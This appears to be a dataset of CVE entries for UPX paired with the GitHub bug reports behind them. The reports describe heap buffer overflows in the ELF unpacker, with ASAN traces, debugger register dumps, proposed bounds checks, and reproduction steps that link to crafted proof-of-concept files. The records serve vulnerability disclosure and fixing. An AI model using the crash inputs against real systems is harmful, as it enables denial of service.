โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ source:p_lx_elf.cpp+5239 โ”€โ”€โ”€โ”€ 5234 unsigned const *const hasharr = &buckets[n_bucket]; (void)hasharr; 5235 //unsigned const *const gashend = &hasharr[n_bucket]; // minimum, except: 5236 // Rust and Android trim unused zeroes from high end of hasharr[] 5237 unsigned bmax = 0; 5238 for (unsigned j= 0; j < n_bucket; ++j) { โ†’ 5239 if (buckets[j]) { 5240 if (buckets[j] < symbias) { 5241 char msg[50]; snprintf(msg, sizeof(msg), 5242 "bad DT_GNU_HASH bucket[%d] < symbias{%#x}\n", 5243 buckets[j], symbias); 5244 throwCantPack(msg); โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ threads โ”€โ”€โ”€โ”€ [#0] Id 1, Name: "upx.out", stopped, reason: SIGSEGV โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ trace โ”€โ”€โ”€โ”€ [#0] 0x53b1a8 โ†’ PackLinuxElf64::invert_pt_dynamic(this=0xa00030, dynp=<optimized out>) [#1] 0x53d654 โ†’ PackLinuxElf64::invert_pt_dynamic(dynp=<optimized out>, this=0xa00030) [#2] 0x53d654 โ†’ PackLinuxElf64::PackLinuxElf64help1(this=0xa00030, f=0x7fffffffce10) [#3] 0x53f186 โ†’ PackLinuxElf64Le::PackLinuxElf64Le(f=0x7fffffffce10, this=0xa00030) [#4] 0x53f186 โ†’ PackLinuxElf64amd::PackLinuxElf64amd(this=0xa00030, f=0x7fffffffce10) [#5] 0x6048ac โ†’ PackMaster::visitAllPackers(func=0x602c30 <try_unpack(Packer*, void*)>, f=0x7fffffffce10, o=0x7fffffffcfc8, user=0x7fffffffce10) [#6] 0x6072ca โ†’ PackMaster::getUnpacker(f=<optimized out>) [#7] 0x6072ca โ†’ PackMaster::unpack(this=0x7fffffffcfb0, fo=0x7fffffffcee0) [#8] 0x670dc5 โ†’ do_one_file(iname=0x7fffffffdf12 "id:000036,sig:11,src:000541+000827,op:MOpt-splice,rep:2", oname=0x7fffffffd550 "/dev/null") [#9] 0x67157c โ†’ do_files(i=0x4, argc=0x5, argv=0x7fffffffdac8) ``` The instruction to crash is, corresponds to the bucket [j] in the source code ```bash mov eax, DWORD PTR [rdi+rsi*4+0x14] ``` The register rdi and rsi are: ```bash $rsi : 0x7aa9 $rdi : 0x0000000000a01548 ``` The DWORD PTR pointer to 0xa20000, where is a invalid address. ```bash gefโžค x /10xg 0xa20000 0xa20000: Cannot access memory at address 0xa20000 ``` ## What should have happened? Decompress a crafted/suspicious file. ## Do you have an idea for a solution? A boundary check is needed for loop variable 'j' because the size allocated for variable 'buckets' is limited. ```cpp upx_uint64_t const *const bitmask = (upx_uint64_t const *)(void const *)&gashtab[4]; unsigned const *const buckets = (unsigned const *)&bitmask[n_bitmask]; unsigned const *const hasharr = &buckets[n_bucket]; (void)hasharr; //unsigned const *const gashend = &hasharr[n_bucket]; // minimum, except: // Rust and Android trim unused zeroes from high end of hasharr[] unsigned bmax = 0; for (unsigned j= 0; j < n_bucket; ++j) { if (buckets[j]) { if (buckets[j] < symbias) { char msg[50]; snprintf(msg, sizeof(msg), "bad DT_GNU_HASH bucket[%d] < symbias{%#x}\n", buckets[j], symbias); throwCantPack(msg); } if (bmax < buckets[j]) { bmax = buckets[j]; } } } ``` ## How can we reproduce the issue? 1. compile upx with address-sanitize 2. execute cmd ```bash upx.out -df $PoC -o /dev/null ``` [Poc](https://github.com/14isnot40/vul_discovery/blob/master/upx/df/hbo_PackLinuxElf64__invert_pt_dynamic) can be found here. ## Please tell us details about your environment. * UPX version used (`upx --version`): ```bash upx 4.0.0-git-c6b9e3c62d15 (latest-devel-branch) UCL data compression library 1.03 zlib data compression library 1.2.8 LZMA SDK version 4.43 ``` * Host Operating System and version: Ubuntu 16.04 64-bit * Host CPU architecture: Intel(R) Core(TM) i5-6200U CPU @ 2.30GHz with 8GB * Target Operating System and version: same as Host * Target CPU architecture: same as Host
[bug] heap buffer overflow in PackLinuxElf64::invert_pt_dynamic at p_lx_elf.cpp:5239
https://api.github.com/repos/upx/upx/issues/379/comments
2
2020-05-23T14:21:20Z
2023-04-17T18:13:35Z
https://github.com/upx/upx/issues/379
623,670,397
379
4,883
CVE-2021-43313
2023-03-24T20:15:08.317
A heap-based buffer overflow was discovered in upx, during the variable 'bucket' points to an inaccessible address. The issue is being triggered in the function PackLinuxElf32::invert_pt_dynamic at p_lx_elf.cpp:1688.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "patrick@puiterwijk.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/upx/upx/issues/378" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/upx/upx/issues/378" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:upx_project:upx:*:*:*:*:*:*:*:*", "matchCriteriaId": "1E4C95CD-E2A9-47E3-9866-FD4B7ECF14AA", "versionEndExcluding": "4.0.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/upx/upx/issues/378
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "upx", "upx" ]
## What's the problem (or question)? A heap-based buffer overflow was discovered in upx, during the variable 'bucket' points to an inaccessible address. The issue is being triggered in the function PackLinuxElf32::invert_pt_dynamic at p_lx_elf.cpp:1688. ASAN reports: ```bash ==110358==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61600000fed9 at pc 0x00000045acc8 bp 0x7ffd88c9b020 sp 0x7ffd88c9b010 READ of size 4 at 0x61600000fed9 thread T0 #0 0x45acc7 in PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE32, LE32, LE32> > const*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:1688 #1 0x463ba5 in PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE32, LE32, LE32> > const*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:1583 #2 0x463ba5 in PackLinuxElf32::PackLinuxElf32help1(InputFile*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:305 #3 0x464e96 in PackLinuxElf32Le::PackLinuxElf32Le(InputFile*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.h:395 #4 0x464e96 in PackLinuxElf32x86::PackLinuxElf32x86(InputFile*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:4800 #5 0x464e96 in PackBSDElf32x86::PackBSDElf32x86(InputFile*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:4817 #6 0x464e96 in PackFreeBSDElf32x86::PackFreeBSDElf32x86(InputFile*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:4828 #7 0x4f337a in PackMaster::visitAllPackers(Packer* (*)(Packer*, void*), InputFile*, options_t const*, void*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:190 #8 0x4f50f9 in PackMaster::getUnpacker(InputFile*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:248 #9 0x4f521f in PackMaster::unpack(OutputFile*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:266 #10 0x52a1e6 in do_one_file(char const*, char*) /home/test/Desktop/EVAULATION/upx/src/work.cpp:160 #11 0x52a69e in do_files(int, int, char**) /home/test/Desktop/EVAULATION/upx/src/work.cpp:271 #12 0x403ace in main /home/test/Desktop/EVAULATION/upx/src/main.cpp:1538 #13 0x7ff33c8dc82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #14 0x404828 in _start (/home/test/Desktop/EVAULATION/upx/src/upx.out+0x404828) 0x61600000fed9 is located 1 bytes to the right of 600-byte region [0x61600000fc80,0x61600000fed8) allocated by thread T0 here: #0 0x7ff33d4d0602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x42732a in MemBuffer::alloc(unsigned long long) /home/test/Desktop/EVAULATION/upx/src/mem.cpp:194 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:1688 PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE32, LE32, LE32> > const*) Shadow bytes around the buggy address: 0x0c2c7fff9f80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff9f90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff9fa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff9fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2c7fff9fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c2c7fff9fd0: 00 00 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa 0x0c2c7fff9fe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fff9ff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fffa000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fffa010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2c7fffa020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==110358==ABORTING ``` Then analysis the reasons for segv by debugging: ```bash Program received signal SIGSEGV, Segmentation fault. 0x0000000000527258 in PackLinuxElf32::invert_pt_dynamic (this=this@entry=0xa00030, dynp=<optimized out>) at p_lx_elf.cpp:1688 1688 if (buckets[j]) { [ Legend: Modified register | Code | Heap | Stack | String ] โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ registers โ”€โ”€โ”€โ”€ $rax : 0x0000000000a009c1 โ†’ 0x00000000ffffffff $rbx : 0x0000000000a00030 โ†’ 0x00000000007267a0 โ†’ <vtable+0> add BYTE PTR [rax], al $rcx : 0x0 $rdx : 0x0 $rsp : 0x00007fffffffcc10 โ†’ 0x0000000000a007c0 โ†’ 0xff0000010900457f $rbp : 0xffffff00 $rsi : 0x7d88 $rdi : 0x6 $rip : 0x0000000000527258 โ†’ <PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> mov r9d, DWORD PTR [rax+rsi*4+0x1c] $r8 : 0x0 $r9 : 0x0 $r10 : 0x10 $r11 : 0x0 $r12 : 0xd $r13 : 0xffffffff $r14 : 0x200 $r15 : 0x0 $eflags: [carry PARITY adjust ZERO sign trap INTERRUPT direction overflow RESUME virtualx86 identification] $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000 โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ stack โ”€โ”€โ”€โ”€ 0x00007fffffffcc10โ”‚+0x0000: 0x0000000000a007c0 โ†’ 0xff0000010900457f โ† $rsp 0x00007fffffffcc18โ”‚+0x0008: 0x0000000000000000 0x00007fffffffcc20โ”‚+0x0010: 0x00007ffff7352260 โ†’ <read+16> cmp rax, 0xfffffffffffff001 0x00007fffffffcc28โ”‚+0x0018: 0x0000000000000258 0x00007fffffffcc30โ”‚+0x0020: 0x00007ffff7362447 โ†’ <lseek64+7> cmp rax, 0xfffffffffffff001 0x00007fffffffcc38โ”‚+0x0028: 0x00000000005255b2 โ†’ <PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> mov rax, QWORD PTR [rsp+0x10] 0x00007fffffffcc40โ”‚+0x0030: 0x0000000000000000 0x00007fffffffcc48โ”‚+0x0038: 0x0000000000000000 โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ code:x86:64 โ”€โ”€โ”€โ”€ 0x527247 <PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> mov rcx, QWORD PTR [rsp+0x8] 0x52724c <PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> mov rdx, QWORD PTR [rsp] 0x527250 <PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> lea rsp, [rsp+0x98] โ†’ 0x527258 <PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> mov r9d, DWORD PTR [rax+rsi*4+0x1c] 0x52725d <PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> test r9d, r9d 0x527260 <PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> je 0x5272eb <PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE32, LE32, LE32> > const*)+7515> 0x527266 <PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> xchg ax, ax 0x527268 <PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> lea rsp, [rsp-0x98] 0x527270 <PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16,+0> mov QWORD PTR [rsp], rdx โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ source:p_lx_elf.cpp+1688 โ”€โ”€โ”€โ”€ 1683 unsigned const *const hasharr = &buckets[n_bucket]; (void)hasharr; 1684 //unsigned const *const gashend = &hasharr[n_bucket]; // minimum, except: 1685 // Rust and Android trim unused zeroes from high end of hasharr[] 1686 unsigned bmax = 0; 1687 for (unsigned j= 0; j < n_bucket; ++j) { โ†’ 1688 if (buckets[j]) { 1689 if (buckets[j] < symbias) { 1690 char msg[50]; snprintf(msg, sizeof(msg), 1691 "bad DT_GNU_HASH bucket[%d] < symbias{%#x}\n", 1692 buckets[j], symbias); 1693 throwCantPack(msg); โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ threads โ”€โ”€โ”€โ”€ [#0] Id 1, Name: "upx.out", stopped, reason: SIGSEGV โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ trace โ”€โ”€โ”€โ”€ [#0] 0x527258 โ†’ PackLinuxElf32::invert_pt_dynamic(this=0xa00030, dynp=<optimized out>) [#1] 0x529294 โ†’ PackLinuxElf32::invert_pt_dynamic(dynp=<optimized out>, this=0xa00030) [#2] 0x529294 โ†’ PackLinuxElf32::PackLinuxElf32help1(this=0xa00030, f=0x7fffffffce20) [#3] 0x52c65e โ†’ PackLinuxElf32Le::PackLinuxElf32Le(f=0x7fffffffce20, this=0xa00030) [#4] 0x52c65e โ†’ PackLinuxElf32x86::PackLinuxElf32x86(f=0x7fffffffce20, this=0xa00030) [#5] 0x52c65e โ†’ PackBSDElf32x86::PackBSDElf32x86(f=0x7fffffffce20, this=0xa00030) [#6] 0x52c65e โ†’ PackFreeBSDElf32x86::PackFreeBSDElf32x86(this=0xa00030, f=0x7fffffffce20) [#7] 0x60448c โ†’ PackMaster::visitAllPackers(func=0x602c30 <try_unpack(Packer*, void*)>, f=0x7fffffffce20, o=0x7fffffffcfd8, user=0x7fffffffce20) [#8] 0x6072ca โ†’ PackMaster::getUnpacker(f=<optimized out>) [#9] 0x6072ca โ†’ PackMaster::unpack(this=0x7fffffffcfc0, fo=0x7fffffffcef0) ``` The instruction to crash is, corresponds to the bucket [j] in the source code ```bash mov r9d, DWORD PTR [rax+rsi*4+0x1c] ``` The value of register rax and rsi are: ```bash $rax : 0x0000000000a009c1 $rsi : 0x7d88 ``` The DWORD PTR pointer to 0xa1fffd, where the 0xa20000 is a invalid address. ```bash gefโžค x /10xg 0xa1fffd 0xa1fffd: Cannot access memory at address 0xa20000 ``` ## What should have happened? Decompress a crafted/suspicious file. ## Do you have an idea for a solution? A boundary check is needed for loop variable 'j' because the size allocated for variable 'buckets' is limited. ```cpp unsigned const *const bitmask = (unsigned const *)(void const *)&gashtab[4]; unsigned const *const buckets = (unsigned const *)&bitmask[n_bitmask]; unsigned const *const hasharr = &buckets[n_bucket]; (void)hasharr; //unsigned const *const gashend = &hasharr[n_bucket]; // minimum, except: // Rust and Android trim unused zeroes from high end of hasharr[] unsigned bmax = 0; for (unsigned j= 0; j < n_bucket; ++j) { if (buckets[j]) { ``` ## How can we reproduce the issue? 1. compile upx with address-sanitize 2. execute cmd ```bash upx.out -df $PoC -o /dev/null ``` [Poc](https://github.com/14isnot40/vul_discovery/blob/master/upx/df/hbo_PackLinuxElf32%5E%25%5E%25invert_pt_dynamic) can be found here. ## Please tell us details about your environment. * UPX version used (`upx --version`): ```bash upx 4.0.0-git-c6b9e3c62d15 (latest-devel-branch) UCL data compression library 1.03 zlib data compression library 1.2.8 LZMA SDK version 4.43 ``` * Host Operating System and version: Ubuntu 16.04 64-bit * Host CPU architecture: Intel(R) Core(TM) i5-6200U CPU @ 2.30GHz with 8GB * Target Operating System and version: same as Host * Target CPU architecture: same as Host
[bug]heap buffer overflow in PackLinuxElf32::invert_pt_dynamic at p_lx_elf.cpp:1688
https://api.github.com/repos/upx/upx/issues/378/comments
2
2020-05-23T14:19:31Z
2023-04-17T18:19:24Z
https://github.com/upx/upx/issues/378
623,670,052
378
4,884
CVE-2021-43316
2023-03-24T20:15:08.460
A heap-based buffer overflow was discovered in upx, during the generic pointer 'p' points to an inaccessible address in func get_le64().
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "patrick@puiterwijk.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/upx/upx/issues/381" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/upx/upx/issues/381" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:upx_project:upx:*:*:*:*:*:*:*:*", "matchCriteriaId": "1E4C95CD-E2A9-47E3-9866-FD4B7ECF14AA", "versionEndExcluding": "4.0.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/upx/upx/issues/381
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "upx", "upx" ]
## What's the problem (or question)? A heap-based buffer overflow was discovered in upx, during the genric pointer 'p' points to an inaccessible address in func get_le64(). The issue can cause a denial of service. The issue is diff from [issue367](https://github.com/upx/upx/issues/367) and [issue368](https://github.com/upx/upx/issues/368) ASAN reports: ```bash ASAN:SIGSEGV ================================================================= ==113201==ERROR: AddressSanitizer: SEGV on unknown address 0x630011d04b20 (pc 0x0000005292e0 bp 0x000000000022 sp 0x7ffebc640bc8 T0) #0 0x5292df in get_le64(void const*) /home/test/Desktop/EVAULATION/upx/src/bele_policy.h:193 #1 0x5292df in N_BELE_RTP::LEPolicy::get64(void const*) const /home/test/Desktop/EVAULATION/upx/src/bele_policy.h:194 #2 0x45784b in Packer::get_te64(void const*) const /home/test/Desktop/EVAULATION/upx/src/packer.h:297 #3 0x45784b in PackLinuxElf64::elf_lookup(char const*) const /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:5423 #4 0x46f7eb in PackLinuxElf64::PackLinuxElf64help1(InputFile*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.cpp:805 #5 0x470479 in PackLinuxElf64Le::PackLinuxElf64Le(InputFile*) /home/test/Desktop/EVAULATION/upx/src/p_lx_elf.h:407 #6 0x470479 in PackLinuxElf64amd::PackLinuxElf64amd(InputFile*) 